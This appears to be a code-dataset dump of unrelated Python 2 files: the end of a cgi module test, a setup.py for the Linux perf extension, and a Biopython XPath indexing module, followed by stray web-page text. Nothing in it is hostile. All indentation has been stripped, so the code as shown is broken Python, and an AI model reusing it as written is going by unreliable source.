("Hbc5161168c542333633315dee1182227:key_store_seqid=400006&cuyer=r&view=bustomer&order_id=0bb2e248638833d48cb7fed300000f1b&expire=964546263&lobale=en-US&kid=130003.300038&ss=env",
{'Hbc5161168c542333633315dee1182227:key_store_seqid': ['400006'],
'cuyer': ['r'],
'expire': ['964546263'],
'kid': ['130003.300038'],
'lobale': ['en-US'],
'order_id': ['0bb2e248638833d48cb7fed300000f1b'],
'ss': ['env'],
'view': ['bustomer'],
}),
("group_id=5470&set=custom&_assigned_to=31392&_status=1&_category=100&SUBMIT=Browse",
{'SUBMIT': ['Browse'],
'_assigned_to': ['31392'],
'_category': ['100'],
'_status': ['1'],
'group_id': ['5470'],
'set': ['custom'],
})
]
def norm(list):
if type(list) == type([]):
list.sort()
return list
def first_elts(list):
return map(lambda x:x[0], list)
def first_second_elts(list):
return map(lambda p:(p[0], p[1][0]), list)
def main():
for orig, expect in parse_qsl_test_cases:
result = cgi.parse_qsl(orig, keep_blank_values=True)
print repr(orig), '=>', result
verify(result == expect, "Error parsing %s" % repr(orig))
for orig, expect in parse_strict_test_cases:
# Test basic parsing
print repr(orig)
d = do_test(orig, "GET")
verify(d == expect, "Error parsing %s" % repr(orig))
d = do_test(orig, "POST")
verify(d == expect, "Error parsing %s" % repr(orig))
env = {'QUERY_STRING': orig}
fcd = cgi.FormContentDict(env)
sd = cgi.SvFormContentDict(env)
fs = cgi.FieldStorage(environ=env)
if type(expect) == type({}):
# test dict interface
verify(len(expect) == len(fcd))
verify(norm(expect.keys()) == norm(fcd.keys()))
verify(norm(expect.values()) == norm(fcd.values()))
verify(norm(expect.items()) == norm(fcd.items()))
verify(fcd.get("nonexistent field", "default") == "default")
verify(len(sd) == len(fs))
verify(norm(sd.keys()) == norm(fs.keys()))
verify(fs.getvalue("nonexistent field", "default") == "default")
# test individual fields
for key in expect.keys():
expect_val = expect[key]
verify(fcd.has_key(key))
verify(norm(fcd[key]) == norm(expect[key]))
verify(fcd.get(key, "default") == fcd[key])
verify(fs.has_key(key))
if len(expect_val) > 1:
single_value = 0
else:
single_value = 1
try:
val = sd[key]
except IndexError:
verify(not single_value)
verify(fs.getvalue(key) == expect_val)
else:
verify(single_value)
verify(val == expect_val[0])
verify(fs.getvalue(key) == expect_val[0])
verify(norm(sd.getlist(key)) == norm(expect_val))
if single_value:
verify(norm(sd.values()) == \
first_elts(norm(expect.values())))
verify(norm(sd.items()) == \
first_second_elts(norm(expect.items())))
# Test the weird FormContentDict classes
env = {'QUERY_STRING': "x=1&y=2.0&z=2-3.%2b0&1=1abc"}
expect = {'x': 1, 'y': 2.0, 'z': '2-3.+0', '1': '1abc'}
d = cgi.InterpFormContentDict(env)
for k, v in expect.items():
verify(d[k] == v)
for k, v in d.items():
verify(expect[k] == v)
verify(norm(expect.values()) == norm(d.values()))
print "Testing log"
cgi.log("Testing")
cgi.logfp = sys.stdout
cgi.initlog("%s", "Testing initlog 1")
cgi.log("%s", "Testing log 2")
if os.path.exists("/dev/null"):
cgi.logfp = None
cgi.logfile = "/dev/null"
cgi.initlog("%s", "Testing log 3")
cgi.log("Testing log 4")
print "Test FieldStorage methods that use readline"
# FieldStorage uses readline, which has the capacity to read all
# contents of the input file into memory; we use readline's size argument
# to prevent that for files that do not contain any newlines in
# non-GET/HEAD requests
class TestReadlineFile:
def __init__(self, file):
self.file = file
self.numcalls = 0
def readline(self, size=None):
self.numcalls += 1
if size:
return self.file.readline(size)
else:
return self.file.readline()
def __getattr__(self, name):
file = self.__dict__['file']
a = getattr(file, name)
if not isinstance(a, int):
setattr(self, name, a)
return a
f = TestReadlineFile(tempfile.TemporaryFile())
f.write('x' * 256 * 1024)
f.seek(0)
env = {'REQUEST_METHOD':'PUT'}
fs = cgi.FieldStorage(fp=f, environ=env)
# if we're not chunking properly, readline is only called twice
# (by read_binary); if we are chunking properly, it will be called 5 times
# as long as the chunksize is 1 << 16.
verify(f.numcalls > 2)
print "Test basic FieldStorage multipart parsing"
env = {'REQUEST_METHOD':'POST', 'CONTENT_TYPE':'multipart/form-data; boundary=---------------------------721837373350705526688164684', 'CONTENT_LENGTH':'558'}
postdata = """-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="id"
1234
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="title"
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
Testing 123.
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="submit"
Add\x20
-----------------------------721837373350705526688164684--
"""
fs = cgi.FieldStorage(fp=StringIO(postdata), environ=env)
verify(len(fs.list) == 4)
expect = [{'name':'id', 'filename':None, 'value':'1234'},
{'name':'title', 'filename':None, 'value':''},
{'name':'file', 'filename':'test.txt','value':'Testing 123.\n'},
{'name':'submit', 'filename':None, 'value':' Add '}]
for x in range(len(fs.list)):
for k, exp in expect[x].items():
got = getattr(fs.list[x], k)
verify(got == exp)
main()
|
project-revolution/android_kernel_sony_msm8974
|
refs/heads/cm-10.2
|
tools/perf/util/setup.py
|
4998
|
#!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='acme@redhat.com',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
|
dbmi-pitt/DIKB-Micropublication
|
refs/heads/master
|
scripts/mp-scripts/Bio/Mindy/XPath.py
|
1
|
import xml.sax, re
from Bio import Std
# To help parse XPath queries
_name = "[a-zA-Z_:][-a-zA-Z0-9._:]*"
_pat_tag_re = re.compile(r"""^//(%s)(\[@(%s)=("[^"]*"|'[^']*')\])?$""" %
(_name, _name) )
#') # emacs cruft
def parse_simple_xpath(s):
# Only supports two formats
# //tag
# //tag[@attr="value"]
m = _pat_tag_re.match(s)
if m is None:
raise TypeError("Cannot yet understand the XPath expression: %r" %
(s,))
tag = m.group(1)
if m.group(3) is not None:
varname = m.group(3)
varvalue = m.group(4)[1:-1]
node_matcher = (tag, [(varname, varvalue)])
else:
node_matcher = (tag, None)
return node_matcher
def xpath_index(dbname,
filenames,
primary_namespace,
extract_info, # pair of (data_value, xpath)
format = "sequence",
record_tag = Std.record.tag,
creator_factory = None,
):
if creator_factory is None:
import BerkeleyDB
creator_factory = BerkeleyDB.create
data_names = [x[0] for x in extract_info]
if primary_namespace not in data_names:
raise TypeError(
"No way to get the %r field needed for the primary (unique) id" %
(primary_namespace,))
data_names.remove(primary_namespace)
for prop, xpath in extract_info:
if prop == primary_namespace:
break
else:
raise TypeError("Property %r has no xpath definition" %
(primary_namespace,))
creator = creator_factory(dbname, primary_namespace, data_names)
builder = GrabXPathNodes(extract_info)
for filename in filenames:
creator.load(filename, builder = builder, record_tag = record_tag,
formatname = format)
creator.close()
class GrabXPathNodes(xml.sax.ContentHandler):
def __init__(self, extractinfo):
self._fast_tags = _fast_tags = {}
for property, xpath in extractinfo:
tag, attrs = parse_simple_xpath(xpath)
_fast_tags.setdefault(tag, []).append( (attrs, property) )
# for doing the endElement in the correct order,
# which is opposite to the input order
self._rev_tags = _rev_tags = {}
for k, v in self._fast_tags.items():
v = v[:]
v.reverse()
self._rev_tags[k] = v
def uses_tags(self):
return self._fast_tags.keys()
def startDocument(self):
self._text = ""
self._capture = []
self.document = {}
def startElement(self, tag, attrs):
if not self._fast_tags.has_key(tag):
return
for want_attrs, prop in self._fast_tags[tag]:
needed = []
if want_attrs is None:
needed.append(prop)
else:
for k, v in want_attrs:
if not attrs.has_key(k) or attrs[k] != v:
break
else:
needed.append(prop)
self.save_info(needed)
def characters(self, s):
if self._capture:
self._text += s
def save_info(self, needed):
if not self._capture:
self._text = ""
self._capture.append( (needed, len(self._text) ) )
def get_info(self):
needed, n = self._capture.pop()
s = self._text[n:]
return s, needed
def endElement(self, tag):
if not self._rev_tags.has_key(tag):
return
text, needed = self.get_info()
for need in needed:
self.document.setdefault(need, []).append(text)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.